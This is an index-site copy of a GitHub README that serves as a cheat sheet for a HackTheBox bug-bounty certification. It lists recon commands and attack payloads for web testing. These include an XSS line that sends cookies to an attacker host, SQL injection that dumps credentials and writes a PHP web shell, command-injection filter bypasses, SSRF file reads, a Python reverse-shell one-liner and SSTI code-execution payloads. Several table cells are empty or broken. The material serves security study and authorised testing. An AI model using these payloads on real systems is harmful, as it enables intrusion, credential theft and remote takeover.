Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/theunknownsoul/htb-certified-bug-bounty-hunter-exam-cheetsheet
All cheetsheets with main information from HTB CBBH role path in one place.
https://github.com/theunknownsoul/htb-certified-bug-bounty-hunter-exam-cheetsheet
bugbounty cheetsheet htb security
Last synced: 7 days ago
JSON representation
All cheetsheets with main information from HTB CBBH role path in one place.
- Host: GitHub
- URL: https://github.com/theunknownsoul/htb-certified-bug-bounty-hunter-exam-cheetsheet
- Owner: TheUnknownSoul
- Created: 2024-01-24T08:43:34.000Z (10 months ago)
- Default Branch: master
- Last Pushed: 2024-03-20T09:23:04.000Z (8 months ago)
- Last Synced: 2024-03-20T10:43:10.711Z (8 months ago)
- Topics: bugbounty, cheetsheet, htb, security
- Language: Python
- Homepage:
- Size: 45.9 KB
- Stars: 3
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# HTB-certified-bug-bounty-hunter-exam-cheetsheet
All cheetsheets with main information about CBBH role path in one place.
# Information Gathering
### WHOIS
| Command | Description |
|----------------------------|-------------------------------------------|
| ```nslookup ``` | Identify A record for the target domain. |
| ```export TARGET="domain.tld"``` | Assign target to an environment variable. |
| ```whois $TARGET``` | WHOIS lookup for the target. |
### DNS Enumeration
| Command | Description |
|----------------------------------|----------------------------------------------------|
| ```nslookup $TARGET``` | Identify the A record for the target domain. |
| ```nslookup -query=A $TARGET``` | Identify the A record for the target domain. |
| ```dig @``` | Identify the A record for the target domain. |
| ```dig a $TARGET @``` | Identify the A record for the target domain. |
| ```nslookup -query=PTR ``` | Identify the PTR record for the target IP address. |
| ```dig -x @``` | Identify the PTR record for the target IP address. |
| ```nslookup -query=ANY $TARGET``` | Identify ANY records for the target domain. |
| ```dig any $TARGET @``` | Identify ANY records for the target domain. |
| ```nslookup -query=TXT $TARGET``` | Identify the TXT records for the target domain. |
| ```dig txt $TARGET @``` | Identify the TXT records for the target domain. |
| ```nslookup -query=MX $TARGET``` | Identify the MX records for the target domain. |
| ```dig mx $TARGET @``` | Identify the MX records for the target domain. |
### Passive Subdomain Enumeration
| Resource/Command | Description |
|-------------------------------------------------------|---------------------------------------------------------------------|
| VirusTotal | https://www.virustotal.com/gui/home/url |
| Censys | https://censys.io/ |
| Crt.sh | https://crt.sh/ |
| ```curl -s https://sonar.omnisint.io/subdomains/{domain} \| jq -r '.[]' sort -u```| All subdomains for a given domain. |
| ```curl -s https://sonar.omnisint.io/tlds/{domain} jq -r '.[]' sort -u``` | All TLDs found for a given domain. |
| ```curl -s https://sonar.omnisint.io/all/{domain} jq -r '.[]' sort -u``` | All results across all TLDs for a given domain. |
| ```curl -s https://sonar.omnisint.io/reverse/{ip} jq -r '.[]' sort -u``` | Reverse DNS lookup on IP address. |
| ```curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} jq -r '.[]' sort -u``` | Reverse DNS lookup of a CIDR range. |
| ```curl -s "https://crt.sh/?q=${TARGET}&output=json" jq -r '.[] "\(.name_value)\n\(.common_name)"' sort -u ``` | |
### Certificate Transparency.
``` cat sources.txt \| while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done ```
Searching for subdomains and other information on the sources provided in the source.txt list.
### Passive Infrastructure Identification
| Resource/Command | Description |
|------------------------------------------------------|------------------------------------------------------------|
| Netcraft | https://www.netcraft.com/ |
| WayBackMachine | http://web.archive.org/ |
| WayBackURLs | https://github.com/tomnomnom/waybackurls |
| waybackurls -dates https://$TARGET > waybackurls.txt | Crawling URLs from a domain with the date it was obtained. |
### Active Infrastructure Identification
| Resource/Command | Description |
|-----------------------------------------------------------------------|-----------------------------------------------|
| ```curl -I "http://${TARGET}"``` | Display HTTP headers of the target webserver. |
| ```whatweb -a https://www.facebook.com -v``` | Technology identification. |
| Wappalyzer | https://www.wappalyzer.com/ |
| ```wafw00f -v https://$TARGET``` | WAF Fingerprinting. |
| Aquatone | https://github.com/michenriksen/aquatone |
| ```cat subdomain.list aquatone -out ./aquatone -screenshot-timeout 1000``` | Makes screenshots of all subdomains in the |
| subdomain.list. | |
### Active Subdomain Enumeration
| Resource/Command | Description |
|----------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------|
| HackerTarget | https://hackertarget.com/zone-transfer/ |
| SecLists | https://github.com/danielmiessler/SecLists |
| ```nslookup -type=any -query=AXFR $TARGET nameserver.target.domain ``` | Zone Transfer using Nslookup against the target domain and its nameserver. |
| ```gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"``` | Bruteforcing subdomains. |
### Virtual Hosts
| Resource/Command | Description |
|---------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------|
| ```curl -s http://192.168.10.10 -H "Host: randomtarget.com" ``` | Changing the HOST HTTP header to request a specific domain. |
| ```cat ./vhosts.list while read vhost;do echo "\n********\nFUZZING: ${vhost}\n********";curl -s -I http:// -H "HOST: ${vhost}.target.domain" \| grep "Content-Length: ";done``` |Bruteforcing for possible virtual hosts on the target domain. | |
| ```ffuf -w ./vhosts -u http:// -H "HOST: FUZZ.target.domain" -fs 612``` | Bruteforcing for possible virtual hosts on the target domain using ffuf. |
### Crawling
| Resource/Command | Description |
|----------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------|
| ZAP | https://www.zaproxy.org/ |
| ```ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt``` | Discovering files and folders that cannot be spotted by browsing the website. |
| ```ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS``` | Mutated bruteforcing against the target web server. |
# Javascript deobfuscation
| Websites |
|---------------------|
| JS Console Prettier |
| Beautifier |
| JSNice |
# Cross-site scripting (XSS)
| Code | Description |
|---------------------------------------------------------------------------------------------------|--------------------------------|
| ```alert(window.origin)``` | Basic XSS Payload |
| `````` | Basic XSS Payload |
| ```print()``` | Basic XSS Payload |
| ```![]()
``` | HTML-based XSS Payload |
| ```document.body.style.background = "#141d2b"``` | Change Background Color |
| ```document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"``` | Change Background Image |
| ```document.title = 'HackTheBox Academy'``` | Change Website Title |
| ```document.getElementsByTagName('body')\[0].innerHTML = 'text'``` | Overwrite website's main body |
| ```document.getElementById('urlform').remove();``` | Remove certain HTML element |
| `````` | Load remote script |
| ```new Image().src='http://OUR_IP/index.php?c='+document.cookie``` | Send Cookie details to us |
# SQL injection
| Command | Description |
|------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------|
| ```mysql -u root -h docker.hackthebox.eu -P 3306 -p``` | login to mysql database |
| ```SHOW DATABASES ``` | List available databases |
| ```USE users ``` | Switch to database |
| ```CREATE TABLE logins (id INT, ...)``` | Add a new table |
| ```SHOW TABLES ``` | List available tables in current database |
| ```DESCRIBE logins ``` | Show table properties and columns |
| ```INSERT INTO table_name VALUES (value_1,..)``` | Add values to table |
| ```INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)``` | Add values to specific columns in a table |
| ```UPDATE table_name SET column1=newvalue1, ... WHERE ``` | Update table values |
| ```SELECT * FROM table_name``` | Show all columns in a table |
| ```SELECT column1, column2 FROM table_name``` | Show specific columns in a table |
| ```DROP TABLE logins``` | Delete a table |
| ```ALTER TABLE logins ADD newColumn INT``` | Add new column |
| ```ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn``` | Rename column |
| ```ALTER TABLE logins MODIFY oldColumn DATE``` | Change column datatype |
| ```ALTER TABLE logins DROP oldColumn``` | Delete column |
| ```SELECT * FROM logins ORDER BY column_1``` | Sort by column |
| ```SELECT * FROM logins ORDER BY column_1 DESC``` | Sort by column in descending order |
| ```SELECT * FROM logins ORDER BY column_1 DESC, id ASC``` | Sort by two-columns |
| ```SELECT * FROM logins LIMIT 2``` | Only show first two results |
| ```SELECT * FROM logins LIMIT 1, 2``` | Only show first two results starting from index 2 |
| ```SELECT * FROM table_name WHERE ``` | List results that meet a condition |
| ```SELECT * FROM logins WHERE username LIKE 'admin%'``` | List results where the name is similar to a given string |
| ```admin' or '1'='1``` | Basic Auth Bypass |
| ```admin')-- -``` | Basic Auth Bypass With comments |
| ```' order by 1-- -``` | Detect number of columns using order by |
| ```cn' UNION select 1,2,3-- -``` | Detect number of columns using Union injection |
| ```cn' UNION select 1,@@version,3,4-- -``` | Basic Union injection |
| ```UNION select username, 2, 3, 4 from passwords-- -``` | Union injection for 4 columns |
| ```SELECT @@version ``` | Fingerprint MySQL with query output |
| ```SELECT SLEEP(5)``` | Fingerprint MySQL with no output |
| ```cn' UNION select 1,database(),2,3-- -``` | Current database name |
| ```cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -``` | List all databases |
| ```cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -``` | List all tables in a specific database |
| ```cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -``` | List all columns in a specific table |
| ```cn' UNION select 1, username, password, 4 from dev.credentials-- -``` | Dump data from a table in another database |
| ```cn' UNION SELECT 1, user(), 3, 4-- -``` | Find current user |
| ```cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -``` | Find if user has admin privileges |
| ```cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -``` | Find if all user privileges |
| ```cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -``` | Find which directories can be accessed through MySQL |
| ```cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- - ``` | Read local file |
| ```select 'file written successfully!' into outfile '/var/www/html/proof.txt'``` | Write a string to a local file |
| ```cn' union select "",'', "", "" into outfile '/var/www/html/shell.php'-- - ``` | Write a web shell into the base web directory |
# Commands injections
| Injection operator | Injected character | URL - encoded character | Executed Command |
|--------------------|--------------------|------------------------------------|---------------------------------------------|
| Semicolon | ; | %3b | Both |
| New Line | \n | %0a | Both |
| Background | & | %26 | Both (second output generally shown first) |
| Pipe | %7c | Both (only second output is shown) |
| AND | && | %26%26 | Both (only if first succeeds) |
| OR | \|\| | %7c%7c | Second (only if first fails) |
| Sub-Shell | `` | %60%60 | Both (Linux-only) |
| Sub-Shell | $() | %24%28%29 | Both (Linux-only) |
### Command injection Bypass
| Command | Description |
|------------------------------------------------------------|-----------------------------------------------------------------------------------|
| ```printenv ``` | Can be used to view all environment variables |
| ```%09``` | Using tabs instead of spaces |
| ```${IFS} ``` | Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $()) |
| ```{ls,-la}``` | Commas will be replaced with spaces |
| ```${PATH:0:1}``` | Will be replaced with / |
| ```${LS_COLORS:10:1}``` | Will be replaced with ; |
| ```$(tr '!-}' '"-~'<<<[)``` | Shift character by one ([ -> \) |
| ```' or "``` | Total must be even |
| ```$@ or \ ``` | Linux only |
| ```$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")``` | Execute command regardless of cases |
| ```$(a="WhOaMi";printf %s "${a,,}") ``` | Another variation of the technique |
| ```echo 'whoami' \| rev``` | Reverse a string |
| ```$(rev<<<'imaohw') ``` | Execute reversed command |
| ```echo -n 'cat /etc/passwd``` | grep 33' \| base64 Encode a string with base64 |
| ```bash<<<$(base64 -d<< bill.txt``` | Generate Usernames List |
# Server side request forgery
| Command | Description |
|-----------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------|
| ```curl -i -s "http:///load?q=http://:8080" ``` | Testing for SSRF vulnerability |
| ```python3 -m http.server 9090 ``` | Starting the python web server |
| ```sudo pip3 install twisted ``` | Installing the ftp server |
| ```sudo python3 -m twisted ftp -p 21 -r . ``` | Starting the ftp server |
| ```curl -i -s "http:///load?q=http://:9090/index.html" ``` | Retrieving a remote file through the target application (HTTP Schema) |
| ```curl -i -s "http:///load?q=file:///etc/passwd" ``` | Retrieving a local file through the target application (File Schema) |
| ```for port in {1..65535};do echo $port >> ports.txt;done ``` | Generating a wordlist of possible ports |
| ```ffuf -w ./ports.txt:PORT -u "http:///load?q=http://127.0.0.1:PORT" -fs 30 ``` | Fuzzing for ports on the internal interface |
| ```curl -i -s "http:///load?q=http://127.0.0.1:5000" ``` | Interacting with the internal interface on the discovered port |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=index.html" ``` | Interacting with the internal application |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=http://127.0.0.1:1"``` | Discovering web application listening in on localhost |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=http::////127.0.0.1:1" ``` | Modifying the URL to bypass the error message |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o - ``` | Requesting to disclose the /proc/self/environ file on the internal application |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=file:://///app/internal_local.py" ``` | Retrieving a local file through the target application |
| ```curl -i -s "http:///load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"``` | Confirming remote code exeuction on the remote host |
| ```sudo apt-get install jq``` | Installing jq |
### Blind SSRF Exploitation Example
| Command | Description |
|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------|
| ```nc -lvnp 9090 ``` | Starting a netcat listener |
| ```echo "\" \| base64 -d ``` | Decoding the base64 encoded response |
| ```export RHOST="";export RPORT="";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));\[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ``` | Reverse shell payload (to be URL encoded twice) |
### SSI Injection Exploitation Example
### SSI Directive Payload Description
| Command | Description |
|----------------------------------------------------------------------------------------------------------------|----------------|
| `````` | Date |
| `````` | All variables |
| `````` | Reverse Shell |
SSTI Exploitation Example 1
| Command | Description |
|------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------|
| ```curl -X POST -d 'email=${7*7}' http://:/jointheteam ``` | Interacting with the remote target (Spring payload) |
| ```curl -X POST -d 'email={{_self.env.display("TEST"}}' http://:/jointheteam ``` | Interacting with the remote target (Twig payload) |
| ```curl -X POST -d 'email={{config.items()}}' http://:/jointheteam ``` | Interacting with the remote target (Jinja2 basic injection) |
| ```curl -X POST -d 'email={{ [].class.base.subclasses() }}' http://:/jointheteam ``` | Interacting with the remote target (Jinja2 dump all classes payload) |
| ```curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://:/jointheteam``` | Interacting with the remote target (Tornado payload) |
| ```curl -gs "http://:/execute?cmd={{7*'7'}}"``` | Interacting with the remote target (Confirming Jinja2 backend) |
| ```./tplmap.py -u 'http://:/execute?cmd'``` | Automating the templating engine identification process with tplmap |